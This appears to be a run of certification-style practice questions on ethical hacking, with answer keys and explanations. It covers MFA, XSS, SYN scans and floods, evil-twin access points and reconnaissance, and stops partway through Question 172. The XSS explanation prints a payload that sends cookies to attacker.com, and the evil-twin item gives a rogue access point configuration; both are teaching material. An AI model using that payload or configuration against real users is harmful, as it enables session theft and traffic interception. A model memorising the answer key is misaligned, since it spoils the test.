Question 161
An organization wants to verify the identity of users accessing systems by requiring something they know, something they have, and something they are. Which authentication approach is this?
A) Single-factor authentication
B) Two-factor authentication
C) Multi-factor authentication
D) Biometric authentication
Answer: C
Explanation:
Authentication security relies on verifying user identity before granting access. Multi-factor authentication (MFA) requires users to provide two or more different types of verification factors from separate categories, significantly enhancing security beyond single passwords.
The three main authentication factor categories include knowledge factors (something you know)—passwords, PINs, security questions, passphrases; possession factors (something you have)—smart cards, security tokens, mobile devices, hardware keys, one-time password generators; and inherence factors (something you are)—biometrics including fingerprints, facial recognition, iris scans, voice patterns, behavioral characteristics.
Multi-factor authentication strength comes from requiring compromise of multiple independent factors. If attackers steal passwords, they still need physical tokens or biometric data. This independence creates significant barriers—phishing captures passwords but not hardware tokens; stolen tokens remain useless without PINs or biometrics.
Common MFA implementations include password plus SMS codes, password plus authenticator apps (Google Authenticator, Microsoft Authenticator), password plus hardware tokens (YubiKey, RSA SecurID), password plus biometrics, and certificate-based authentication combining cryptographic credentials with additional factors.
Security benefits include breach protection—stolen passwords alone insufficient for access; phishing resistance—some MFA methods resist credential theft; compliance requirements—meeting regulatory mandates (PCI DSS, HIPAA, GDPR); reduced fraud—significantly decreasing account takeover incidents; and user confidence—enhanced trust in security measures.
Implementation considerations include user experience balance, recovery procedures for lost factors, support costs, technology compatibility, and phishing-resistant methods like FIDO2/WebAuthn providing strongest protection.
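As one concrete illustration, the one-time codes produced by authenticator apps follow the TOTP algorithm (RFC 6238, built on RFC 4226's HOTP). A minimal sketch of a verifier using only the Python standard library:

```python
import hashlib
import hmac
import struct

def hotp(key: bytes, counter: int, digits: int = 6) -> str:
    """HMAC-based one-time password (RFC 4226)."""
    msg = struct.pack(">Q", counter)          # 8-byte big-endian counter
    digest = hmac.new(key, msg, hashlib.sha1).digest()
    offset = digest[-1] & 0x0F                # dynamic truncation
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)

def totp(key: bytes, unix_time: int, step: int = 30) -> str:
    """Time-based OTP (RFC 6238): HOTP over a 30-second time counter."""
    return hotp(key, unix_time // step)

# RFC test secret; at t=59s the 30-second counter is 1
print(totp(b"12345678901234567890", 59))  # -> 287082
```

The code matches the RFC 4226 test vectors, which is why authenticator apps from different vendors all produce the same six digits for the same shared secret and time window.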
Why other options are incorrect:
A) Single-factor authentication uses only one verification method, typically passwords. This provides weakest security, vulnerable to various attacks.
B) Two-factor authentication requires exactly two factors. The scenario describes three distinct factors (know, have, are), making multi-factor authentication the most accurate answer.
D) Biometric authentication specifically uses biological characteristics. While biometrics may be one MFA component, this term doesn’t encompass the complete multi-factor approach described.
Question 162
A penetration tester discovers that a web server reveals detailed error messages including database structure and SQL queries. Which vulnerability does this represent?
A) SQL injection
B) Information disclosure
C) Cross-Site Scripting
D) Authentication bypass
Answer: B
Explanation:
Web applications must carefully manage what information they reveal to users. Information disclosure vulnerabilities occur when applications expose sensitive data through error messages, debug information, configuration details, or other channels, providing attackers valuable intelligence for targeting systems.
Information disclosure encompasses various scenarios where systems reveal more information than necessary for legitimate functionality. Detailed error messages are particularly problematic because they assist attackers in understanding application architecture, identifying vulnerabilities, and crafting targeted attacks.
Common disclosure examples include verbose error messages—revealing database types, table structures, query syntax, file paths, and software versions; debug information—exposing internal application logic, variable values, and stack traces; directory listings—showing file structures and naming conventions; source code comments—containing developer notes about security mechanisms; version banners—advertising specific software versions with known vulnerabilities; and backup files—exposing configuration or source code through accessible backup copies.
Attack value includes understanding database schema for SQL injection attacks, identifying software versions for exploit selection, discovering authentication mechanisms for bypass attempts, mapping application structure for targeted attacks, and gathering credentials or API keys from configuration files.
Example scenarios include database errors displaying SQL queries revealing table names and column structures, exceptions showing internal file paths indicating server configuration, connection failures exposing backend server addresses, and authentication errors differentiating between invalid usernames versus incorrect passwords.
Remediation requires implementing generic error messages for users while logging detailed errors server-side, disabling debug modes in production, removing unnecessary comments from code, preventing directory browsing, securing backup files, customizing server banners, and conducting regular security reviews.
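The first remediation step—generic messages for users, full detail only in server-side logs—can be sketched as follows. The function and field names are illustrative, not from any particular framework:

```python
import logging
import traceback
import uuid

logging.basicConfig(level=logging.ERROR)
log = logging.getLogger("app")

def safe_error_response(exc: Exception) -> dict:
    """Log full detail server-side; return only a generic message plus
    a short correlation ID the user can quote to support staff."""
    error_id = uuid.uuid4().hex[:8]
    log.error("error %s: %s\n%s", error_id, exc, traceback.format_exc())
    return {"error": "An internal error occurred.", "id": error_id}

# The caller never sees the SQL text, file path, or stack trace:
resp = safe_error_response(ValueError("syntax error near 'SELECT * FROM users'"))
print(resp["error"])  # -> An internal error occurred.
```

The correlation ID keeps errors debuggable without leaking the database structure or query syntax described in the scenario.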
Why other options are incorrect:
A) SQL injection exploits insufficient input validation to inject malicious SQL commands. While information disclosure might help identify SQL injection opportunities, verbose errors themselves represent disclosure rather than injection vulnerabilities.
C) Cross-Site Scripting injects malicious scripts executing in user browsers. XSS exploits output encoding weaknesses rather than excessive information revelation in error messages.
D) Authentication bypass circumvents security controls to gain unauthorized access. While disclosed information might facilitate bypass attempts, the error message exposure itself constitutes information disclosure.
Question 163
An ethical hacker uses a technique that involves sending crafted packets to determine which hosts are active without completing TCP connections. Which scan type is this?
A) TCP Connect scan
B) TCP SYN scan
C) UDP scan
D) ICMP Echo scan
Answer: B
Explanation:
Port scanning techniques vary in stealth and effectiveness. TCP SYN scan (half-open scan) sends SYN packets to target ports without completing three-way handshakes, efficiently identifying open ports while maintaining relative stealth compared to full connection scans.
TCP SYN scanning exploits the TCP handshake process. Normal connections require three steps: client sends SYN, server responds with SYN-ACK for open ports or RST for closed ports, and client completes with ACK. SYN scans stop after receiving responses, never sending final ACK packets.
Detection mechanism analyzes server responses: SYN-ACK received—indicates open port accepting connections; RST received—indicates closed port actively rejecting connections; no response—suggests filtered port with firewall blocking; and ICMP unreachable—indicates filtering with explicit rejection messages.
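The response analysis above maps directly to code. A sketch of the classification logic, using Nmap-style flag strings ("SA" for SYN-ACK, "R" for RST) as illustrative input:

```python
from typing import Optional

def classify_port(tcp_flags: Optional[str], icmp_unreachable: bool = False) -> str:
    """Interpret the reply to a single SYN probe.
    tcp_flags: flag string from the reply ('SA', 'R', ...), or None if
    nothing came back before the timeout."""
    if icmp_unreachable:
        return "filtered (ICMP unreachable)"
    if tcp_flags is None:
        return "filtered (no response)"
    if "S" in tcp_flags and "A" in tcp_flags:
        return "open"        # SYN-ACK: port accepting connections
    if "R" in tcp_flags:
        return "closed"      # RST: port actively rejecting connections
    return "unknown"

print(classify_port("SA"))   # -> open
print(classify_port("R"))    # -> closed
print(classify_port(None))   # -> filtered (no response)
```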
Advantages include efficiency—faster than full connections since handshakes aren’t completed; stealth—some older systems don’t log incomplete connections; resource conservation—consuming fewer scanner and target resources; accuracy—reliable port state determination; and firewall evasion—bypassing some application-level filters expecting complete connections.
Technical requirements need raw socket access for crafting custom packets, typically requiring administrative privileges. Tools like Nmap implement SYN scanning with -sS flag: nmap -sS target.
Limitations include modern intrusion detection systems easily detecting SYN scan patterns, stateful firewalls tracking connection states may block or alert, and some security devices specifically designed to identify and block scanning attempts.
Modern detection involves monitoring for numerous SYN packets without corresponding ACK packets, identifying patterns of sequential port probing, analyzing connection state tables for anomalies, and correlating scanning activities across multiple targets.
Why other options are incorrect:
A) TCP Connect scan completes full three-way handshakes using the operating system’s connect() function. This is the noisiest scan type, generating complete connection logs that contrast with the SYN scan’s incomplete connections.
C) UDP scan sends UDP packets to discover open UDP services. Since UDP is connectionless, scanning is slower and less reliable than TCP SYN scanning.
D) ICMP Echo scan sends ping requests to determine host availability. While identifying active hosts, ICMP scanning doesn’t check specific TCP ports like SYN scanning does.
Question 164
A company implements a security control that automatically locks user accounts after five consecutive failed login attempts. Which attack is this primarily designed to prevent?
A) Man-in-the-Middle attack
B) Brute force attack
C) Session hijacking
D) SQL injection
Answer: B
Explanation:
Authentication mechanisms require protection against automated attack methods. Account lockout policies defend against brute force attacks where attackers systematically try numerous password combinations, either sequentially testing all possibilities or using dictionaries of common passwords.
Brute force attacks attempt authentication by trying many passwords rapidly until finding the correct one. Without countermeasures, attackers can test thousands or millions of combinations using automated tools, eventually succeeding against weak passwords or discovering credentials through persistence.
Account lockout mechanisms counter brute force by monitoring failed authentication attempts and temporarily or permanently disabling accounts after exceeding thresholds. After five failed attempts, the account locks, requiring administrator intervention or time-based automatic unlock, effectively stopping automated password guessing.
Implementation parameters include threshold count—failed attempts before lockout (typically 3-10); lockout duration—temporary locks (15-30 minutes) or permanent requiring manual unlock; reset period—timeframe for counting failures (attempts within 15 minutes); notification—alerting users and administrators; and exceptions—potentially excluding certain administrative accounts.
Security benefits include automated attack prevention—stopping password guessing tools; slow attack mitigation—even slow attempts eventually trigger lockouts; detection capability—failed attempt patterns indicating attacks; deterrence—making attacks impractical through time consumption; and audit trails—logging suspicious authentication patterns.
Considerations include balancing security against usability (avoiding legitimate user lockouts), addressing denial of service attacks intentionally locking accounts, implementing CAPTCHA as lockout alternatives, monitoring for distributed attacks against multiple accounts, and establishing clear unlock procedures.
Advanced protections combine lockout with progressive delays (increasing wait times between attempts), account monitoring flagging suspicious patterns, IP-based rate limiting, and multi-factor authentication eliminating password-only dependency.
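The parameters above (threshold, reset period, lockout duration) combine into a small state machine. A minimal sketch, with the scenario's five-attempt threshold and illustrative window values:

```python
import time
from collections import defaultdict

class LockoutPolicy:
    """Lock an account after `threshold` failures within `window` seconds,
    for `lockout` seconds. Values here mirror common policy defaults."""
    def __init__(self, threshold=5, window=900, lockout=1800):
        self.threshold, self.window, self.lockout = threshold, window, lockout
        self.failures = defaultdict(list)   # user -> failure timestamps
        self.locked_until = {}              # user -> unlock time

    def is_locked(self, user, now=None):
        now = time.time() if now is None else now
        return self.locked_until.get(user, 0) > now

    def record_failure(self, user, now=None):
        now = time.time() if now is None else now
        recent = [t for t in self.failures[user] if now - t < self.window]
        recent.append(now)
        self.failures[user] = recent
        if len(recent) >= self.threshold:
            self.locked_until[user] = now + self.lockout  # trigger lockout

    def record_success(self, user):
        self.failures.pop(user, None)       # reset counter on success
```

Five failures inside the reset window lock the account; the lock expires automatically after the lockout duration, matching the time-based unlock option described above.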
Why other options are incorrect:
A) Man-in-the-Middle attacks intercept communications between parties. Account lockout doesn’t address interception attacks, which require encryption and certificate validation for prevention.
C) Session hijacking steals active session identifiers to impersonate authenticated users. Lockout policies don’t protect against session theft, which requires secure session management and monitoring.
D) SQL injection exploits insufficient input validation in database queries. Account lockout addresses authentication attacks rather than input validation vulnerabilities in application code.
Question 165
An attacker creates a fake wireless access point with the same SSID as a legitimate network to intercept user traffic. What type of attack is this?
A) Deauthentication attack
B) Evil twin attack
C) WPS attack
D) Packet sniffing
Answer: B
Explanation:
Wireless network attacks exploit user trust and connectivity behavior. Evil twin attacks create fraudulent access points mimicking legitimate networks, tricking users into connecting and routing their traffic through attacker-controlled infrastructure.
Evil twin refers to rogue access points impersonating trusted wireless networks. Attackers configure access points with identical or similar SSIDs, potentially matching security settings, and position themselves where targets naturally seek WiFi connectivity—coffee shops, airports, hotels, conference centers.
Attack methodology involves reconnaissance to identify target networks and their characteristics, deploying rogue access points broadcasting matching SSIDs, potentially jamming legitimate networks forcing reconnection, waiting for victims to connect automatically or manually, intercepting all traffic passing through the malicious access point, and potentially stripping encryption or presenting fake authentication portals.
User perspective shows available network appearing legitimate—same name, similar signal strength. Users connect believing they’re accessing trusted infrastructure, unaware that attackers control the access point and can monitor, modify, or redirect all traffic.
Attack objectives include credential theft—capturing login credentials through fake portals or monitoring unencrypted authentication; traffic interception—reading sensitive communications including emails, messages, browsing; man-in-the-middle positioning—enabling further attacks against connected users; malware distribution—redirecting downloads to infected versions; and session hijacking—stealing authentication tokens.
Technical implementation uses portable equipment like laptops with wireless cards, dedicated WiFi Pineapple devices, or even smartphones with hotspot capabilities. Tools like Airbase-ng, hostapd, or commercial penetration testing tools facilitate creation.
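As an illustration of how little configuration such a rogue access point requires, a minimal hostapd configuration for an authorized lab exercise might look like the following. The interface name and SSID are placeholders:

```
# hostapd.conf -- authorized lab use only
interface=wlan0        # wireless interface placed in AP mode
driver=nl80211
ssid=CoffeeShop_WiFi   # SSID copied from the target network
hw_mode=g              # 2.4 GHz band
channel=6
# No passphrase settings: an open network mirrors typical public
# hotspots, so victims connect without any credential prompt.
```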
Detection challenges include users having difficulty distinguishing legitimate from malicious networks, automatic connection features connecting without user awareness, and evil twins potentially offering stronger signals than legitimate networks.
Prevention requires avoiding untrusted networks, verifying network authenticity with staff, using VPNs encrypting all traffic regardless of network security, disabling automatic connection features, monitoring for certificate warnings, and maintaining updated security software.
Why other options are incorrect:
A) Deauthentication attacks forcibly disconnect clients from access points using spoofed management frames. While potentially used alongside evil twins, deauth attacks disrupt connections rather than creating fake access points.
C) WPS attacks exploit Wi-Fi Protected Setup vulnerabilities to recover WPA2 passphrases through PIN brute forcing. This targets legitimate access points rather than creating fake ones.
D) Packet sniffing captures network traffic for analysis. While evil twins enable sniffing, the described scenario specifically involves creating fake access points rather than passively monitoring traffic.
Question 166
A security team wants to identify security weaknesses in systems without actually exploiting them. Which assessment type should be conducted?
A) Penetration test
B) Vulnerability assessment
C) Red team exercise
D) Social engineering test
Answer: B
Explanation:
Security assessments range from passive identification to active exploitation. Vulnerability assessments systematically identify, quantify, and prioritize security weaknesses in systems without actually exploiting discovered vulnerabilities, providing risk understanding without compromise risks.
Vulnerability assessment uses automated scanning tools, manual inspection, and configuration reviews to discover security flaws including missing patches, misconfigurations, weak passwords, unnecessary services, and known vulnerabilities. The focus remains on identification and reporting rather than exploitation validation.
Assessment process includes scope definition—identifying systems, networks, and applications to assess; scanning execution—using tools like Nessus, Qualys, OpenVAS, or Rapid7; credential vs non-credential—authenticated scans providing deeper visibility versus external perspectives; manual verification—confirming automated findings and identifying false positives; risk prioritization—ranking vulnerabilities by severity and exploitability; and reporting—documenting findings with remediation recommendations.
Scanner capabilities include identifying missing security patches, detecting default or weak credentials, discovering misconfigured security settings, checking for known vulnerabilities (CVEs), analyzing network services and versions, identifying compliance violations, and mapping attack surfaces.
Advantages include comprehensive coverage—efficiently scanning numerous systems; non-disruptive—avoiding exploitation risks to production environments; regular scheduling—enabling continuous monitoring; compliance support—meeting regulatory requirements; prioritization—helping focus remediation efforts; and trend analysis—tracking security posture over time.
Limitations include potential false positives requiring validation, false negatives missing certain vulnerabilities, inability to assess exploitability without testing, contextual gaps missing business logic flaws, and dependence on signature updates for latest vulnerability detection.
Complementary activities combine vulnerability assessment with penetration testing validating exploitability, configuration management ensuring consistent settings, patch management addressing identified gaps, and security monitoring detecting exploitation attempts.
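The risk-prioritization step reduces to an ordering problem over scanner findings. A sketch using illustrative CVSS-style fields (the field names are assumptions, not any scanner's actual output format):

```python
def prioritize(findings):
    """Rank findings: exploitable ones first, then by CVSS base score,
    then by the number of affected hosts."""
    return sorted(
        findings,
        key=lambda f: (f["exploit_available"], f["cvss"], f["hosts"]),
        reverse=True,
    )

findings = [
    {"id": "CVE-A", "cvss": 9.8, "exploit_available": False, "hosts": 2},
    {"id": "CVE-B", "cvss": 7.5, "exploit_available": True,  "hosts": 40},
    {"id": "CVE-C", "cvss": 5.3, "exploit_available": False, "hosts": 1},
]
print([f["id"] for f in prioritize(findings)])  # -> ['CVE-B', 'CVE-A', 'CVE-C']
```

Note that a known public exploit outranks raw score here—a common policy choice, since exploitability often matters more than theoretical severity.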
Why other options are incorrect:
A) Penetration testing actively exploits vulnerabilities to demonstrate real-world attack impact, going beyond identification to validation through compromise attempts.
C) Red team exercises simulate sophisticated adversaries using multiple attack vectors, focusing on achieving specific objectives through exploitation rather than systematic vulnerability identification.
D) Social engineering tests specifically target human vulnerabilities through phishing, pretexting, or physical intrusion attempts rather than technical system weaknesses.
Question 167
An ethical hacker discovers that a web application accepts and executes user-supplied JavaScript code in the browser context. Which vulnerability exists?
A) SQL injection
B) Cross-Site Scripting (XSS)
C) Command injection
D) Directory traversal
Answer: B
Explanation:
Web applications must properly handle user input before including it in output. Cross-Site Scripting (XSS) vulnerabilities occur when applications accept and execute user-supplied code (typically JavaScript) in browsers without proper validation or sanitization, enabling attackers to execute malicious scripts in victim browsers.
XSS exploitation allows attackers to inject client-side scripts into web pages viewed by other users. When victims access compromised pages, malicious scripts execute in their browser contexts with full access to cookies, session tokens, DOM, and ability to modify page content.
Attack mechanics involve identifying input fields reflected in application output, crafting malicious JavaScript payloads, injecting code through vulnerable parameters, and executing in victim browsers when they view affected pages. Example payload: <script>document.location='http://attacker.com/steal?cookie='+document.cookie</script>.
XSS categories include Reflected XSS—immediately reflecting input without storage; Stored XSS—permanently saving malicious code in databases; DOM-based XSS—client-side script manipulation; and Mutation XSS—exploiting browser parsing behavior.
Attack objectives include session hijacking—stealing authentication cookies to impersonate users; credential theft—displaying fake login forms capturing passwords; phishing—redirecting to malicious sites or presenting fraudulent content; keylogging—capturing all user input; malware distribution—exploiting browser vulnerabilities; and website defacement—modifying visual appearance.
Real-world impact enables account takeover, sensitive data theft, malware propagation, reputation damage, and regulatory compliance violations. High-profile XSS vulnerabilities have affected major platforms including social networks, webmail services, and e-commerce sites.
Prevention requires input validation—accepting only expected characters and patterns; output encoding—converting special characters to HTML entities before display; Content Security Policy—restricting script sources and inline execution; HTTPOnly cookies—preventing JavaScript cookie access; security headers—implementing X-XSS-Protection; and framework protections—using modern frameworks with built-in XSS prevention.
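Output encoding, the core defense, is typically a one-line call; Python's standard library shows the idea:

```python
import html

user_input = "<script>document.location='http://attacker.com/steal'</script>"

# Convert special characters to HTML entities before echoing the value
# back into a page, so the browser renders it as text, not markup.
safe = html.escape(user_input)
print(safe)
```

After escaping, `<` becomes `&lt;` and quotes become entities, so the payload displays harmlessly instead of executing. The same principle underlies the auto-escaping built into modern templating frameworks.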
Why other options are incorrect:
A) SQL injection targets database layer by injecting malicious SQL commands, exploiting insufficient query parameterization rather than browser-side script execution.
C) Command injection executes operating system commands on servers through vulnerable applications, targeting server-side execution rather than client-side browser scripts.
D) Directory traversal manipulates file paths to access unauthorized files using sequences like ../, exploiting file system access rather than script execution capabilities.
Question 168
A company wants to ensure that terminated employees immediately lose access to all systems and resources. Which access control principle should be implemented?
A) Role-Based Access Control
B) Centralized access management
C) Mandatory Access Control
D) Discretionary Access Control
Answer: B
Explanation:
Managing user access across multiple systems presents significant security challenges. Centralized access management provides unified identity and access control, enabling organizations to grant, modify, or revoke permissions across all systems from single administrative interfaces.
Centralized management consolidates authentication and authorization decisions through identity providers or access management platforms. When users terminate employment, administrators disable accounts once, automatically revoking access to all connected systems, applications, and resources simultaneously.
Implementation technologies include Active Directory—Microsoft’s directory service for Windows environments; LDAP servers—lightweight directory access protocol for cross-platform identity management; Identity-as-a-Service—cloud-based solutions like Okta, Azure AD, Google Workspace; Single Sign-On—enabling unified authentication across applications; and privileged access management—controlling administrative credentials centrally.
Advantages include immediate revocation—terminating access instantly across all systems; consistency—ensuring uniform access policies; reduced administration—managing users once rather than per-system; audit capabilities—centralized logging of access activities; compliance support—demonstrating access control governance; and onboarding efficiency—rapidly provisioning new users.
User lifecycle management encompasses provisioning accounts during onboarding, modifying permissions for role changes, temporarily suspending for leaves of absence, immediately disabling for terminations, and eventually deleting inactive accounts after retention periods.
Access revocation workflow includes HR initiating termination notifications, automated workflows triggering across identity systems, immediate account disabling preventing authentication, access removal from applications and systems, physical access card deactivation, and comprehensive audit logging documenting timing.
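The workflow above hinges on one property: every system consults the same identity provider, so a single disable call revokes access everywhere. A toy sketch (class and system names are illustrative):

```python
class CentralIdentityProvider:
    """Toy model: every connected system checks this provider for each
    access decision, so one disable call revokes access everywhere."""
    def __init__(self, systems):
        self.systems = set(systems)       # e.g. {"email", "vpn", "crm"}
        self.active = set()               # currently enabled users

    def provision(self, user):            # onboarding
        self.active.add(user)

    def disable(self, user):              # HR-triggered on termination
        self.active.discard(user)

    def can_access(self, user, system):
        return system in self.systems and user in self.active

idp = CentralIdentityProvider(["email", "vpn", "crm"])
idp.provision("alice")
idp.disable("alice")                      # one call, all systems
print(idp.can_access("alice", "vpn"))     # -> False
```

Contrast this with per-system accounts, where termination requires a separate (and easily forgotten) disable action on every application.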
Challenges include initial implementation complexity requiring system integration, ensuring all applications connect to centralized systems, maintaining synchronization across distributed environments, establishing disaster recovery procedures, and balancing automation with required human oversight.
Why other options are incorrect:
A) Role-Based Access Control assigns permissions based on organizational roles. While RBAC simplifies permission management, it doesn’t specifically address centralized control enabling simultaneous access revocation.
C) Mandatory Access Control uses system-enforced security labels and clearances, typically in government/military contexts. MAC addresses access control methodology rather than centralized management capabilities.
D) Discretionary Access Control allows resource owners to control access to their resources. DAC describes permission delegation rather than centralized management enabling comprehensive immediate revocation.
Question 169
An attacker sends a large number of connection requests to exhaust server resources and prevent legitimate users from accessing services. What type of attack is this?
A) Ping flood
B) SYN flood
C) Smurf attack
D) DNS amplification
Answer: B
Explanation:
Denial of Service attacks exploit protocol weaknesses to overwhelm systems. SYN flood attacks exploit the TCP three-way handshake mechanism by sending numerous SYN packets without completing connections, exhausting server resources allocated for half-open connections.
TCP handshake vulnerability exists because servers allocate resources upon receiving SYN packets before authentication completes. Normal handshakes involve client sending SYN, server responding with SYN-ACK and allocating connection resources, and client completing with ACK. SYN floods send countless SYN packets but never send final ACK packets.
Attack mechanics involve generating massive SYN packet volumes using spoofed source addresses preventing responses from reaching attackers, targeting server connection queues (backlog) filling available slots with half-open connections, exhausting server memory and CPU tracking connection states, and preventing legitimate connection establishment once queues fill.
Resource exhaustion occurs through connection table filling with pending connections, memory consumption for tracking state information, CPU overhead processing connection attempts, and potential firewall state table exhaustion affecting network infrastructure.
Attack effectiveness increases through distributed attacks using botnets, spoofed source addresses complicating filtering, targeting specific service ports, and sustaining attacks longer than server timeout periods.
Detection indicators include unusually high SYN packet rates, numerous half-open connections in network state tables, connection establishment failures for legitimate users, server performance degradation, and monitoring alerts for abnormal connection patterns.
Mitigation strategies include SYN cookies—cryptographic techniques avoiding state allocation until handshake completion; connection rate limiting—restricting new connections per timeframe; increased backlog queues—allocating more connection tracking capacity; firewalls and IPS—filtering malicious traffic patterns; timeout reduction—faster release of half-open connections; upstream filtering—ISP-level traffic blocking; and DDoS mitigation services—specialized providers absorbing attack traffic.
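Connection rate limiting, one of the mitigations listed above, can be sketched as a sliding window per source address. The thresholds here are arbitrary illustrative values:

```python
from collections import defaultdict, deque

class SynRateLimiter:
    """Allow at most `limit` new connection attempts per source IP within
    any `window`-second span; reject the rest."""
    def __init__(self, limit=100, window=1.0):
        self.limit, self.window = limit, window
        self.history = defaultdict(deque)   # ip -> attempt timestamps

    def allow(self, src_ip, now):
        q = self.history[src_ip]
        while q and now - q[0] >= self.window:
            q.popleft()                     # expire attempts outside the window
        if len(q) < self.limit:
            q.append(now)
            return True
        return False

rl = SynRateLimiter(limit=3, window=1.0)
results = [rl.allow("10.0.0.1", t) for t in (0.0, 0.1, 0.2, 0.3)]
print(results)  # -> [True, True, True, False]
```

Note the limitation the surrounding text implies: because SYN floods commonly spoof source addresses, per-IP limiting helps most against unsophisticated attacks, which is why SYN cookies and upstream filtering remain the stronger defenses.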
Why other options are incorrect:
A) Ping floods send excessive ICMP Echo Request packets consuming bandwidth and processing resources. While also DoS attacks, ping floods use ICMP rather than exploiting TCP handshake mechanisms.
C) Smurf attacks send ICMP packets to broadcast addresses with spoofed victim source addresses, causing multiple responses overwhelming targets. This amplification attack differs from SYN flood’s handshake exploitation.
D) DNS amplification exploits DNS servers sending large responses to queries with spoofed source addresses, amplifying attack traffic. This uses DNS protocol rather than TCP SYN flooding.
Question 170
A security professional needs to securely transmit sensitive data over the internet by converting it into an unreadable format. Which security technique should be used?
A) Hashing
B) Encryption
C) Compression
D) Encoding
Answer: B
Explanation:
Protecting data confidentiality during transmission requires strong security mechanisms. Encryption transforms readable plaintext into unreadable ciphertext using cryptographic algorithms and keys, ensuring only authorized parties possessing correct decryption keys can restore data to readable format.
Encryption fundamentals use mathematical algorithms (ciphers) and secret keys to perform reversible transformations. Legitimate recipients possessing appropriate keys decrypt ciphertext back to original plaintext, while attackers without keys find data unintelligible.
Encryption types include symmetric encryption—using identical keys for encryption and decryption (AES, DES, 3DES, Blowfish), offering fast performance for large data volumes; and asymmetric encryption—using key pairs where public keys encrypt and private keys decrypt (RSA, ECC), providing key distribution advantages but slower performance.
Data protection scenarios include data in transit—protecting communications over networks using TLS/SSL, VPNs, SSH; data at rest—securing stored files, databases, backups; data in use—protecting active processing through secure enclaves; and end-to-end encryption—ensuring only endpoints can decrypt, protecting against intermediary access.
Common protocols for internet transmission include TLS/SSL—encrypting web traffic (HTTPS), email (SMTPS, IMAPS), and other application protocols; IPsec—network layer encryption for VPNs; SSH—secure remote administration; and PGP/GPG—email encryption.
Key management critically impacts security. Organizations must securely generate strong random keys, protect keys from unauthorized access, implement key rotation schedules, establish backup and recovery procedures, and maintain separation between data and keys.
Encryption strength depends on algorithm selection (modern standards like AES-256 or RSA-2048+), key length (longer keys providing stronger security), proper implementation avoiding side-channel vulnerabilities, and secure key management throughout lifecycles.
Why other options are incorrect:
A) Hashing creates fixed-length digests from input data, providing integrity verification but not confidentiality. Hash functions are one-way transformations that cannot be reversed to recover original data.
C) Compression reduces data size by eliminating redundancy, improving storage and transmission efficiency. While useful, compression doesn’t protect confidentiality—compressed data remains readable once decompressed.
D) Encoding transforms data between formats (Base64, ASCII, URL encoding) for compatibility purposes. Encoding provides no security—anyone can decode without keys, making data fully readable.
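The distinction between the incorrect options is easy to demonstrate with the standard library: encoding reverses with no key at all, and hashing does not reverse. (Encryption itself is not shown, since the Python standard library ships no cipher; a library such as `cryptography` would be needed.)

```python
import base64
import hashlib

secret = b"account number 12345"

# Encoding: anyone can reverse it -- no confidentiality whatsoever.
encoded = base64.b64encode(secret)
assert base64.b64decode(encoded) == secret

# Hashing: a one-way, fixed-length digest -- useful for integrity
# checks, but the original bytes cannot be recovered from it.
digest = hashlib.sha256(secret).hexdigest()
print(len(digest))  # -> 64 (hex characters, regardless of input size)

# Only encryption ties readability to possession of a secret key,
# which is the property the scenario requires.
```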
Question 171
An ethical hacker performs reconnaissance by searching public sources like social media, company websites, and news articles without directly interacting with target systems. What type of reconnaissance is this?
A) Active reconnaissance
B) Passive reconnaissance
C) Social engineering
D) Vulnerability scanning
Answer: B
Explanation:
Information gathering follows different approaches based on target interaction. Passive reconnaissance collects intelligence about targets using publicly available information and observational techniques without directly engaging target systems, maintaining stealth and avoiding detection.
Passive reconnaissance leverages open-source intelligence (OSINT) from publicly accessible sources. Attackers gather substantial information without generating logs, alerts, or suspicious activity on target networks, making detection virtually impossible during this phase.
Information sources include search engines—using advanced Google queries (Google Dorking) finding sensitive information; social media—LinkedIn for organizational structure, employee information, Facebook/Twitter for personal details; company websites—job postings revealing technologies, press releases announcing initiatives; DNS records—WHOIS data, DNS enumeration for infrastructure mapping; public databases—SEC filings, patent databases, business registrations; code repositories—GitHub accidentally exposing credentials or sensitive code; and archived content—Wayback Machine for historical website versions.
Gathered intelligence provides organizational structure understanding, employee names and contact information, technology stack identification, network infrastructure details, business relationships and partnerships, security posture insights, and potential social engineering targets.
Common techniques include WHOIS lookups—identifying domain ownership and contacts; DNS enumeration—discovering subdomains and mail servers; social media profiling—building target dossiers; job posting analysis—learning required skills and technologies; metadata extraction—finding information in document properties; and Netcraft queries—researching web server technologies.
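Several of the techniques above (metadata extraction, code repository searches, archived content review) reduce to sifting collected text for identifiers such as email addresses and subdomains. A minimal, hypothetical sketch using only the Python standard library; the sample page content and the example.com domain are invented for illustration:

```python
import re

def extract_osint(text: str, domain: str):
    """Pull email addresses and subdomains of `domain` from raw page text."""
    emails = set(re.findall(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+", text))
    sub_pattern = rf"\b((?:[\w-]+\.)+{re.escape(domain)})\b"
    subdomains = set(re.findall(sub_pattern, text))
    return emails, subdomains

# Hypothetical scraped content, for illustration only.
page = """Contact jane.doe@example.com or hr@example.com.
Services run at vpn.example.com and mail.corp.example.com."""

emails, subs = extract_osint(page, "example.com")
print(sorted(emails))  # ['hr@example.com', 'jane.doe@example.com']
print(sorted(subs))    # ['mail.corp.example.com', 'vpn.example.com']
```

Real OSINT tooling (theHarvester, Maltego) automates this kind of extraction across many public sources; the point of the sketch is that no packet ever touches the target's own systems.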
Advantages include complete stealth without target system interaction, minimal legal exposure since the information gathered is publicly available, unlimited time for thorough research, and valuable planning information for subsequent attack phases.
Defensive limitations make passive reconnaissance difficult to prevent since information is publicly available. Organizations should minimize information exposure, educate employees about oversharing, monitor for information leakage, control metadata in published documents, and implement social media policies.
Why other options are incorrect:
A) Active reconnaissance directly interacts with target systems through port scanning, vulnerability scanning, or enumeration. This generates logs and potentially triggers security alerts, contrasting with passive information gathering.
C) Social engineering manipulates people into revealing information or performing actions, involving direct human interaction. While reconnaissance might inform social engineering, it’s not reconnaissance itself.
D) Vulnerability scanning actively probes systems identifying security weaknesses. Scanning generates significant traffic and alerts, representing active rather than passive techniques.
Question 172
A company implements a security policy requiring all sensitive data to be classified and labeled based on confidentiality levels. Which security principle is being applied?
A) Data Loss Prevention
B) Data classification
C) Data encryption
D) Data backup
Answer: B
Explanation:
Managing information security requires understanding data sensitivity levels. Data classification systematically categorizes information assets based on confidentiality, integrity, and availability requirements, enabling appropriate protection controls matching data value and risk.
Classification process establishes standardized categories (Public, Internal, Confidential, Restricted), defines criteria for each level, assigns data owners responsible for classification, applies labels to data assets, implements appropriate security controls per classification, and regularly reviews classifications as requirements change.
